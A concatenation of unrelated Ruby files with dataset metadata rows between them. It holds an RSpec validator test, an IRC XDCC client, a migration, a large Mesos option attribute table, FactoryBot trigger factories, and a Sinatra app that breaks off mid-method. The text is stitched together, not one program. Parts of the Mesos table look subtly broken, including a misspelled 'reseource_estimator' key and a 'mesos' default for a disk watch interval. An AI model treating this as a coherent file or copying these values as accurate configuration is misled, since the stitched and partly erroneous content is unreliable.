end | 54 | 122 | 0.600823 |
0801fde038761b9b0f09893d51ecbc39d542bbfe | 10,243 | require 'kontena/cli/apps/yaml/validator_v2'
describe Kontena::Cli::Apps::YAML::ValidatorV2 do
describe '#validate_options' do
context 'build' do
it 'can be string' do
result = subject.validate_options('build' => '.')
expect(result.valid?).to be_truthy
expect(result.errors.key?('build')).to be_falsey
end
it 'can be hash' do
result = subject.validate_options('build' => { 'context' => '.' })
expect(result.valid?).to be_truthy
expect(result.errors.key?('build')).to be_falsey
end
it 'returns error if build is hash and context is missing' do
result = subject.validate_options('build' => {})
expect(result.valid?).to be_falsey
expect(result.errors.key?('build')).to be_truthy
end
it 'returns error if optional dockerfile is not string' do
result = subject.validate_options('build' => {
'context' => '.',
'dockerfile' => 123
})
expect(result.valid?).to be_falsey
expect(result.errors.key?('build')).to be_truthy
end
end
it 'validates image is string' do
result = subject.validate_options('image' => true)
expect(result.valid?).to be_falsey
expect(result.errors.key?('image')).to be_truthy
end
it 'validates stateful is boolean' do
result = subject.validate_options('stateful' => 'bool')
expect(result.errors.key?('stateful')).to be_truthy
end
it 'validates network_mode is host or bridge' do
result = subject.validate_options('network_mode' => 'invalid')
expect(result.errors.key?('network_mode')).to be_truthy
result = subject.validate_options('network_mode' => 'bridge')
expect(result.errors.key?('network_mode')).to be_falsey
result = subject.validate_options('network_mode' => 'host')
expect(result.errors.key?('network_mode')).to be_falsey
end
context 'affinity' do
it 'is optional' do
result = subject.validate_options({})
expect(result.errors.key?('affinity')).to be_falsey
end
it 'must be array' do
result = subject.validate_options('affinity' => 'node==node1')
expect(result.errors.key?('affinity')).to be_truthy
result = subject.validate_options('affinity' => ['node==node1'])
expect(result.errors.key?('affinity')).to be_falsey
end
it 'validates format' do
result = subject.validate_options('affinity' => ['node=node1'])
expect(result.errors.key?('affinity')).to be_truthy
result = subject.validate_options('affinity' => ['node==node1', 'service!=mariadb'])
expect(result.errors.key?('affinity')).to be_falsey
end
end
context 'command' do
it 'is optional' do
result = subject.validate_options({})
expect(result.errors.key?('command')).to be_falsey
end
it 'must be string or empty' do
result = subject.validate_options('command' => 1234)
expect(result.errors.key?('command')).to be_truthy
result = subject.validate_options('command' => nil)
expect(result.errors.key?('command')).to be_falsey
result = subject.validate_options('command' => 'bundle exec rails s')
expect(result.errors.key?('command')).to be_falsey
end
end
it 'validates cpu_shares is integer' do
result = subject.validate_options('cpu_shares' => '1m')
expect(result.errors.key?('cpu_shares')).to be_truthy
result = subject.validate_options('cpu_shares' => 1024)
expect(result.errors.key?('cpu_shares')).to be_falsey
result = subject.validate_options({})
expect(result.errors.key?('cpu_shares')).to be_falsey
end
it 'validates environment is array or hash' do
result = subject.validate_options('environment' => 'KEY=VALUE')
expect(result.errors.key?('environment')).to be_truthy
result = subject.validate_options('environment' => ['KEY=VALUE'])
expect(result.errors.key?('environment')).to be_falsey
result = subject.validate_options('environment' => { 'KEY' => 'VALUE' })
expect(result.errors.key?('environment')).to be_falsey
end
context 'validates secrets' do
it 'must be array' do
result = subject.validate_options('secrets' => {})
expect(result.errors.key?('secrets')).to be_truthy
end
context 'item' do
it 'must contain secret' do
result = subject.validate_options('secrets' => [{ 'name' => 'test', 'type' => 'env' }])
expect(result.errors.key?('secrets')).to be_truthy
end
it 'must contain name' do
result = subject.validate_options('secrets' => [{ 'secret' => 'test', 'type' => 'env' }])
expect(result.errors.key?('secrets')).to be_truthy
end
it 'must contain type' do
result = subject.validate_options('secrets' => [{ 'secret' => 'test', 'name' => 'test' }])
expect(result.errors.key?('secrets')).to be_truthy
end
it 'accepts valid input' do
result = subject.validate_options('secrets' =>
[
{
'secret' => 'test',
'name' => 'test',
'type' => 'env'
}
])
expect(result.errors.key?('secrets')).to be_falsey
end
end
end
context 'logging' do
context 'options' do
it 'must be hash' do
result = subject.validate_options('logging' => { 'options' => [] })
expect(result.errors.key?('logging')).to be_truthy
data = {
'logging' => {
'options' => {
'syslog-address' => "tcp://192.168.0.42:123"
}
}
}
result = subject.validate_options(data)
expect(result.errors.key?('logging')).to be_falsey
end
end
end
context 'hooks' do
context 'validates pre_build' do
it 'must be array' do
result = subject.validate_options('hooks' => { 'pre_build' => {} })
expect(result.errors.key?('hooks')).to be_truthy
data = {
'hooks' => {
'pre_build' => [
{
'cmd' => 'rake db:migrate'
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks')).to be_falsey
end
end
context 'post_start' do
it 'must be array' do
result = subject.validate_options('hooks' => { 'post_start' => {} })
expect(result.errors.key?('hooks')).to be_truthy
data = {
'hooks' => {
'post_start' => [
{
'name' => 'migrate',
'cmd' => 'rake db:migrate',
'instances' => '*'
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks')).to be_falsey
end
context 'item' do
it 'must contain name' do
result = subject.validate_options('hooks' =>
{
'post_start' => [
{
'cmd' => 'rake db:migrate',
'instances' => '1'
}
]
})
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
it 'must contain cmd' do
result = subject.validate_options('hooks' =>
{
'post_start' => [
{
'name' => 'migrate',
'instances' => '1'
}
]
})
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
it 'must contain instance number or *' do
result = subject.validate_options('hooks' =>
{
'post_start' => [
{ 'name' => 'migrate',
'cmd' => 'rake db:migrate'
}
]
})
expect(result.errors.key?('hooks.post_start')).to be_truthy
data = {
'hooks' => {
'post_start' => [
{
'name' => 'migrate',
'cmd' => 'rake db:migrate',
'instances' => 'all',
'oneshot' => true
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
it 'may contain boolean oneshot' do
data = {
'hooks' => {
'post_start' => [
{
'name' => 'migrate',
'cmd' => 'rake db:migrate',
'instances' => '*',
'oneshot' => 'true'
}
]
}
}
result = subject.validate_options(data)
expect(result.errors.key?('hooks.post_start')).to be_truthy
end
end
it 'validates depends_on is array' do
result = subject.validate_options('depends_on' => 'web')
expect(result.errors.key?('depends_on')).to be_truthy
result = subject.validate_options('depends_on' => ['web'])
expect(result.errors.key?('depends_on')).to be_falsey
end
it 'validates volumes is array' do
result = subject.validate_options('volumes' => '/app')
expect(result.errors.key?('volumes')).to be_truthy
result = subject.validate_options('volumes' => ['/app'])
expect(result.errors.key?('volumes')).to be_falsey
end
it 'validates volumes_from is array' do
result = subject.validate_options('volumes_from' => 'mysql_data')
expect(result.errors.key?('volumes_from')).to be_truthy
result = subject.validate_options('volumes_from' => ['mysql_data'])
expect(result.errors.key?('volumes_from')).to be_falsey
end
end
end
end
end
| 33.917219 | 100 | 0.531485 |
87f6fd5927d41a054df9abc9643ab4eae9552e33 | 1,433 | require 'cinch'
module XDCC
class Client
attr_accessor :bot
attr_accessor :connected
alias_method :connected?, :connected
@mutex # Mutex
@connection_resource # ConditionVariable
def initialize(server, channel: nil, nickname: "Guest-#{Time.now.to_i}")
this = self
@mutex = mutex = Mutex.new
@connection_resource = connection_resource = ConditionVariable.new
@connected = false
@bot = Cinch::Bot.new do
configure do |c|
c.server = server
c.nick = nickname
c.channels = ["##{channel}"] if channel
end
on :connect do |m|
mutex.synchronize {
this.connected = true
connection_resource.signal
}
end
end
@bot.loggers.level = :info
end
def connect
@mutex.synchronize do
if connected?
@bot.info('Already connected')
return
end
end
Thread.new @bot, &:start
@mutex.synchronize {@connection_resource.wait @mutex}
@bot.info("Connected to #{@bot.config.server}:#{@bot.config.port}")
end
def disconnect
@mutex.synchronize do
if !connected?
@bot.info "Not connected"
return
end
end
@bot.quit
@mutex.synchronize {@connected = false}
@bot.info "Disconnected from #{@bot.config.server}:#{@bot.config.port}"
end
end
end
| 24.288136 | 77 | 0.5806 |
e91a3edddcfeecfed82c97e5c653605b7ca080ec | 168 | class CreateUsersUsingReplication < BaseOctopusMigrationClass
def self.up
Cat.create!(:name => 'Replication')
end
def self.down
Cat.delete_all
end
end
| 16.8 | 61 | 0.732143 |
5d4cc02e882f7d5df0410f8fbb58aab059a2cb24 | 21,583 | default['mesos']['options'] = {
'master' => {
'acls' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'advertise_ip' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'advertise_port' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'allocation_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1secs',
'flag' => false,
'deprecated' => false
},
'allocator' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'HierarchicalDRF',
'flag' => false,
'deprecated' => false
},
'authenticate' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'authenticate_slaves' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'authenticators' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'authorizers' => {
'version' => ['0.23.0'],
'default' => 'local',
'flag' => false,
'deprecated' => false
},
'cluster' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'credentials' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'external_log_file' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'firewall_rules' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'framework_sorter' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'drf',
'flag' => false,
'deprecated' => false
},
'hooks' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'hostname' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'initialize_driver_logging' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'ip' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'ip_discovery_command' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'log_auto_initialize' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'log_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/var/log/mesos',
'flag' => false,
'deprecated' => false
},
'logbufsecs' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 0,
'flag' => false,
'deprecated' => false
},
'logging_level' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'INFO',
'flag' => false,
'deprecated' => false
},
'max_slave_ping_timeouts' => {
'version' => ['0.23.0'],
'default' => 5,
'flag' => false,
'deprecated' => false
},
'max_executors_per_slave' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'modules' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'offer_timeout' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'port' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5050',
'flag' => false,
'deprecated' => false
},
'quiet' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'quorum' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 1,
'flag' => false,
'deprecated' => false
},
'rate_limits' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'recovery_slave_removal_limit' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '100%',
'flag' => false,
'deprecated' => false
},
'registry' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'replicated_log',
'flag' => false,
'deprecated' => false
},
'registry_fetch_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'registry_store_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5secs',
'flag' => false,
'deprecated' => false
},
'registry_strict' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'roles' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'root_submissions' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'slave_ping_timeout' => {
'version' => ['0.23.0'],
'default' => '15secs',
'flag' => false,
'deprecated' => false
},
'slave_removal_rate_limit' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'slave_register_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '10mins',
'flag' => false,
'deprecated' => false
},
'user_sorter' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'drf',
'flag' => false,
'deprecated' => false
},
'webui_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/usr/local/share/mesos/webui',
'flag' => false,
'deprecated' => false
},
'weights' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'whitelist' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '*',
'flag' => false,
'deprecated' => false
},
'work_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'zk' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'zk_session_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '10secs',
'flag' => false,
'deprecated' => false
}
},
'slave' => {
'attributes' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'authenticatee' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => 'crammd5',
'flag' => false,
'deprecated' => false
},
'cgroups_cpu_enable_pids_and_tids_count' => {
'version' => ['0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'cgroups_enable_cfs' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'cgroups_hierarchy' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/sys/fs/cgroup',
'flag' => false,
'deprecated' => false
},
'cgroups_limit_swap' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'cgroups_root' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'mesos',
'flag' => false,
'deprecated' => false
},
'container_disk_watch_interval' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => 'mesos',
'flag' => false,
'deprecated' => false
},
'cgroups_subsystems' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1'],
'default' => '',
'flag' => false,
'deprecated' => true
},
'checkpoint' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1'],
'default' => true,
'flag' => true,
'deprecated' => true
},
'containerizer_path' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'containerizers' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'mesos',
'flag' => false,
'deprecated' => false
},
'credential' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'default_container_image' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'default_container_info' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'network_enable_socket_statistics' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1'],
'default' => false,
'flag' => true,
'deprecated' => true
},
'default_role' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '*',
'flag' => false,
'deprecated' => false
},
'disk_watch_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'docker' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'docker',
'flag' => false,
'deprecated' => false
},
'docker_remove_delay' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '6hrs',
'flag' => false,
'deprecated' => false
},
'docker_kill_orphans' => {
'version' => ['0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'docker_sandbox_directory' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1'],
'default' => '/mnt/mesos/sandbox',
'flag' => false,
'deprecated' => true
},
'docker_stop_timeout' => {
'version' => ['0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '0secs',
'flag' => false,
'deprecated' => false
},
'egress_limit_per_container' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'enforce_container_disk_quota' => {
'version' => ['0.22.0', '0.22.1'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'ephemeral_ports_per_container' => {
'version' => ['0.23.0'],
'default' => 1024,
'flag' => false,
'deprecated' => false
},
'eth0_name' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'executor_environment_variables' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'executor_registration_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'executor_shutdown_grace_period' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5secs',
'flag' => false,
'deprecated' => false
},
'external_log_file' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'frameworks_home' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'gc_delay' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1weeks',
'flag' => false,
'deprecated' => false
},
'gc_disk_headroom' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '0.1',
'flag' => false,
'deprecated' => false
},
'hadoop_home' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'hooks' => {
'version' => ['0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'hostname' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'initialize_driver_logging' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'ip' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'ip_discovery_command' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'isolation' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'posix/cpu,posix/mem',
'flag' => false,
'deprecated' => false
},
'launcher_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/usr/libexec/mesos',
'flag' => false,
'deprecated' => false
},
'lo_name' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'log_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/var/log/mesos',
'flag' => false,
'deprecated' => false
},
'logbufsecs' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '0',
'flag' => false,
'deprecated' => false
},
'logging_level' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'INFO',
'flag' => false,
'deprecated' => false
},
'master' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'modules' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'oversubscribed_resources_interval' => {
'version' => ['0.23.0'],
'default' => '15secs',
'flag' => false,
'deprecated' => false
},
'perf_duration' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '10secs',
'flag' => false,
'deprecated' => false
},
'perf_events' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'perf_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1mins',
'flag' => false,
'deprecated' => false
},
'port' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '5051',
'flag' => false,
'deprecated' => false
},
'qos_controller' => {
'version' => ['0.23.0'],
'default' => false,
'flag' => false,
'deprecated' => false
},
'qos_correction_interval_min' => {
'version' => ['0.23.0'],
'default' => '0secs',
'flag' => false,
'deprecated' => false
},
'quiet' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => false,
'flag' => true,
'deprecated' => false
},
'recover' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => 'reconnect',
'flag' => false,
'deprecated' => false
},
'recovery_timeout' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '15mins',
'flag' => false,
'deprecated' => false
},
'registration_backoff_factor' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1secs',
'flag' => false,
'deprecated' => false
},
'reseource_estimator' => {
'version' => ['0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'resource_monitoring_interval' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '1secs',
'flag' => false,
'deprecated' => false
},
'resources' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'revocable_cpu_low_priority' => {
'version' => ['0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'sandbox_directory' => {
'version' => ['0.23.0'],
'default' => '/mnt/mesos/sandbox',
'flag' => false,
'deprecated' => false
},
'slave_subsystems' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '',
'flag' => false,
'deprecated' => false
},
'strict' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'switch_user' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => true,
'flag' => true,
'deprecated' => false
},
'work_dir' => {
'version' => ['0.20.0', '0.20.1', '0.21.0', '0.21.1', '0.22.0', '0.22.1', '0.23.0'],
'default' => '/tmp/mesos',
'flag' => false,
'deprecated' => false
}
}
}
| 30.70128 | 90 | 0.418802 |
b9c25e89aea30e019a42ac2036775ea765c86b8f | 1,661 | FactoryBot.define do
trait :jmaxml_trigger_base do
cur_site { cms_site }
name { unique_id }
training_status { 'disabled' }
test_status { 'disabled' }
end
factory :jmaxml_trigger_quake_intensity_flash,
class: Jmaxml::Trigger::QuakeIntensityFlash, traits: [:jmaxml_trigger_base] do
earthquake_intensity { '5+' }
end
factory :jmaxml_trigger_quake_info,
class: Jmaxml::Trigger::QuakeInfo, traits: [:jmaxml_trigger_base] do
earthquake_intensity { '5+' }
end
factory :jmaxml_trigger_tsunami_alert,
class: Jmaxml::Trigger::TsunamiAlert, traits: [:jmaxml_trigger_base] do
sub_types { %w(special_alert alert warning) }
end
factory :jmaxml_trigger_tsunami_info,
class: Jmaxml::Trigger::TsunamiInfo, traits: [:jmaxml_trigger_base] do
sub_types { %w(special_alert alert warning) }
end
factory :jmaxml_trigger_weather_alert,
class: Jmaxml::Trigger::WeatherAlert, traits: [:jmaxml_trigger_base] do
sub_types { %w(special_alert alert warning) }
end
factory :jmaxml_trigger_landslide_info,
class: Jmaxml::Trigger::LandslideInfo, traits: [:jmaxml_trigger_base]
factory :jmaxml_trigger_flood_forecast,
class: Jmaxml::Trigger::FloodForecast, traits: [:jmaxml_trigger_base]
factory :jmaxml_trigger_volcano_flash,
class: Jmaxml::Trigger::VolcanoFlash, traits: [:jmaxml_trigger_base]
factory :jmaxml_trigger_ash_fall_forecast,
class: Jmaxml::Trigger::AshFallForecast, traits: [:jmaxml_trigger_base] do
sub_types { %w(flash regular detail) }
end
factory :jmaxml_trigger_tornado_alert,
class: Jmaxml::Trigger::TornadoAlert, traits: [:jmaxml_trigger_base]
end
| 32.568627 | 82 | 0.748946 |
bbdcf5da6e0dc2d8588050e9e9e226213ce84990 | 10,415 | class App < Sinatra::Base
set :public_folder, File.dirname(__FILE__) + '/public'
set :static, true
set :logging, true
set :server, 'thin'
JS_FILES = [
'support/jquery.min.js',
'support/swfobject.js',
'support/web_socket.js',
'support/json2.js',
'support/underscore-min.js',
'support/backbone-min.js',
'support/jquery-ui.js',
'app.js',
'admin.js',
'youtube.js',
'blip.js',
'chat.js',
]
def current_user
@current_user ||= User.find_by_id(session[:user_id]) if session[:user_id]
end
def login_required
if current_user.nil?
if request.xhr?
status 401
else
session[:return_to] = request.path
redirect '/auth'
end
halt
end
end
def render_javascript(files)
return JS_CACHE['core'] if JS_CACHE.has_key?('core')
data = files.map{|f|File.read "#{File.dirname(__FILE__)}/javascripts/#{f}"}
